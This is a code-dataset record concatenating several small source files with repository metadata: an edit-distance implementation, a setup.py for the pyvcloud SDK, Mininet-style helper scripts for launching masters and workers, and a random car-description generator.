008fdb2af661310c65f656f017ec34e5df004424
|
[
"MIT"
] | null | null | null |
algorithms/edit_distance.py
|
costincaraivan/cs-refresher
|
008fdb2af661310c65f656f017ec34e5df004424
|
[
"MIT"
] | null | null | null |
# import unittest
import logging
from timeit import timeit
logging.basicConfig(level=logging.INFO)
def memoize(function):
cache = {}
def memo(*args):
if args not in cache:
cache[args] = function(*args)
return cache[args]
return memo
@memoize
def edit_distance_recursive(source, target):
if source == "":
return len(target)
if target == "":
return len(source)
if source[-1] == target[-1]:
cost = 0
else:
cost = 1
return min(
edit_distance_recursive(source[:-1], target) + 1,
edit_distance_recursive(source, target[:-1]) + 1,
edit_distance_recursive(source[:-1], target[:-1]) + cost
)
logging.info(edit_distance_recursive("intention", "execution"))
logging.info(edit_distance_recursive("jackrabbits", "jackhammer"))
logging.info(edit_distance_recursive("ie", "e"))
def edit_distance_iterative(source, target):
    rows = len(source) + 1
    columns = len(target) + 1
    if rows == 1:
        return columns - 1
    if columns == 1:
        return rows - 1
    # Initialize the (len(source) + 1) x (len(target) + 1) DP table.
    edit_distances = [[0] * columns for i in range(rows)]
    for row in range(rows):
        edit_distances[row][0] = row
    for column in range(columns):
        edit_distances[0][column] = column
    for column in range(1, columns):
        for row in range(1, rows):
            if source[row - 1] == target[column - 1]:
                cost = 0
            else:
                cost = 1
            edit_distances[row][column] = min(
                edit_distances[row - 1][column] + 1,
                edit_distances[row][column - 1] + 1,
                edit_distances[row - 1][column - 1] + cost
            )
    # for row in range(rows):
    #     logging.info(edit_distances[row])
    return edit_distances[rows - 1][columns - 1]
logging.info(edit_distance_iterative("intention", "execution"))
logging.info(edit_distance_iterative("jackrabbits", "jackhammer"))
logging.info(edit_distance_iterative("ie", "e"))
logging.info(timeit('edit_distance_recursive("intention", "execution")',
setup='from __main__ import edit_distance_recursive', number=100))
logging.info(timeit('edit_distance_iterative("intention", "execution")',
setup='from __main__ import edit_distance_iterative', number=100))
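# A minimal alternative sketch (not part of the original module): the standard
# library's functools.lru_cache provides the same memoization as the
# hand-rolled decorator above.
from functools import lru_cache
@lru_cache(maxsize=None)
def edit_distance_lru(source, target):
    if source == "":
        return len(target)
    if target == "":
        return len(source)
    cost = 0 if source[-1] == target[-1] else 1
    return min(
        edit_distance_lru(source[:-1], target) + 1,
        edit_distance_lru(source, target[:-1]) + 1,
        edit_distance_lru(source[:-1], target[:-1]) + cost
    )
logging.info(edit_distance_lru("intention", "execution"))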
| 27.505882
| 86
| 0.618477
| 0
| 0
| 0
| 0
| 431
| 0.184346
| 0
| 0
| 407
| 0.17408
|
62ab97280947669585b79c2c2795dd161b100377
| 2,365
|
py
|
Python
|
hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 2
|
2015-06-15T02:16:33.000Z
|
2022-02-23T07:10:38.000Z
|
hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 7
|
2016-05-13T06:39:45.000Z
|
2016-05-20T02:55:31.000Z
|
hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py
|
Hybrid-Cloud/badam
|
390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb
|
[
"Apache-2.0"
] | 4
|
2015-11-02T04:02:50.000Z
|
2021-05-13T17:06:00.000Z
|
# VMware vCloud Python SDK
# Copyright (c) 2014 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='pyvcloud',
version='11',
description='VMware vCloud Python SDK',
long_description=read('README.rst'),
url='https://github.com/vmware/pyvcloud',
author='VMware, Inc.',
author_email='pgomez@vmware.com',
packages=find_packages(),
install_requires=required,
license='License :: OSI Approved :: Apache Software License',
classifiers=[
'Development Status :: 1 - Planning',
'License :: OSI Approved :: Apache Software License',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'Intended Audience :: Developers',
'Environment :: No Input/Output (Daemon)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Distributed Computing',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
],
keywords='pyvcloud vcloud vcloudair vmware',
platforms=['Windows', 'Linux', 'Solaris', 'Mac OS-X', 'Unix'],
test_suite='tests',
tests_require=[],
zip_safe=True
)
| 37.539683
| 74
| 0.659197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,633
| 0.690486
|
62ac5880cfcb73a7f5f41808ba14ed348ca4e208
| 607
|
py
|
Python
|
net_utils.py
|
mfatihaktas/edge-load-balance
|
b866ca47ba37a605eeba05658b1d302f6855a23f
|
[
"MIT"
] | null | null | null |
net_utils.py
|
mfatihaktas/edge-load-balance
|
b866ca47ba37a605eeba05658b1d302f6855a23f
|
[
"MIT"
] | null | null | null |
net_utils.py
|
mfatihaktas/edge-load-balance
|
b866ca47ba37a605eeba05658b1d302f6855a23f
|
[
"MIT"
] | null | null | null |
import os
from debug_utils import *
def run(node_l, cmd_l):
popens = {}
for i, n in enumerate(node_l):
popens[n] = n.popen(cmd_l[i])
log(DEBUG, "Started {}".format(n))
def run_masters(m_l):
run(m_l, ['./run.sh m {}'.format(i) for i in range(len(m_l))])
log(DEBUG, "done")
def run_workers(w_l):
run(w_l, ['./run.sh w {}'.format(i) for i in range(len(w_l))])
log(DEBUG, "done")
def run_dashboard_server(d):
run([d], ['./run.sh d'])
log(DEBUG, "done")
# TODO: does not work
def pkill():
os.system('pkill -f client.py; pkill -f master.py; pkill -f worker.py; pkill -f dashboard.py')
log(DEBUG, "done")
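# A hedged variant sketch (not part of the original module): like run(), but
# returns the Popen handles and waits for the commands to finish. Node objects
# and their .popen() method are assumed to come from Mininet, as above.
def run_and_wait(node_l, cmd_l):
    popens = {n: n.popen(cmd_l[i]) for i, n in enumerate(node_l)}
    for n, p in popens.items():
        p.wait()
        log(DEBUG, "Finished {}".format(n))
    return popens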
| 24.28
| 95
| 0.634267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.299835
|
62ac8d841db4303175fa7656df2488f0b321c7c1
| 2,086
|
py
|
Python
|
auto.py
|
fabiaant/Automation-car-generator
|
aa57f1a69e4c4b1abf123b6bb88863862d43c4eb
|
[
"MIT"
] | 1
|
2018-10-05T15:12:08.000Z
|
2018-10-05T15:12:08.000Z
|
auto.py
|
fabiaant/Automation-car-generator
|
aa57f1a69e4c4b1abf123b6bb88863862d43c4eb
|
[
"MIT"
] | null | null | null |
auto.py
|
fabiaant/Automation-car-generator
|
aa57f1a69e4c4b1abf123b6bb88863862d43c4eb
|
[
"MIT"
] | 1
|
2021-08-30T01:18:36.000Z
|
2021-08-30T01:18:36.000Z
|
import random
options = {
"year": {
"start": 1946,
"end": 2020
},
"body": ["Sedan", "Wagon", "Hatchback", "Coupe", "SUV", "Utility", "MPV",
"Convertible", "Van"],
"engine_location": ["front", "mid", "rear"],
"engine_mounting": ["transverse", "longitudinal"],
"drive": ["FWD", "RWD", "AWD", "4x4"],
"engine": {
"aspiration": ["naturally aspirated", "turbocharged"],
"layout": [
{
"Inline-": [3, 4, 5, 6]
},
{
"60° V": [6, 8, 12]
},
{
"90° V": [6, 8, 10]
},
{
"Boxer-": [4, 6]
}
]
}
}
def choose_year():
years = options["year"]
inclusive_range = range(years["start"], years["end"] + 1)
return random.choice(inclusive_range)
def choose_body():
return random.choice(options["body"])
def choose_engine_location():
return random.choice(options["engine_location"])
def choose_engine_mounting():
return random.choice(options["engine_mounting"])
def choose_drive():
return random.choice(options["drive"])
def choose_engine():
aspiration = random.choice(options["engine"]["aspiration"])
style = random.choice(options["engine"]["layout"])
style_name = list(style.keys())[0]
cyl_count = random.choice(style[style_name])
engine_string = aspiration + " " + style_name + str(cyl_count)
return engine_string
# Make it a class for the fuck of it lol
class Car:
def __init__(self):
self.year = choose_year()
self.engine_location = choose_engine_location()
self.engine_mounting = choose_engine_mounting()
self.drive = choose_drive()
self.engine = choose_engine()
self.body = choose_body()
def describe(self):
return f"A {self.year} {self.drive} {self.body} with a {self.engine_location}-"\
f"{self.engine_mounting} mounted {self.engine}!"
car = Car()
print("Your next car will be:")
print(car.describe())
input("Press enter to close")
| 27.813333
| 88
| 0.57047
| 459
| 0.219828
| 0
| 0
| 0
| 0
| 0
| 0
| 604
| 0.289272
|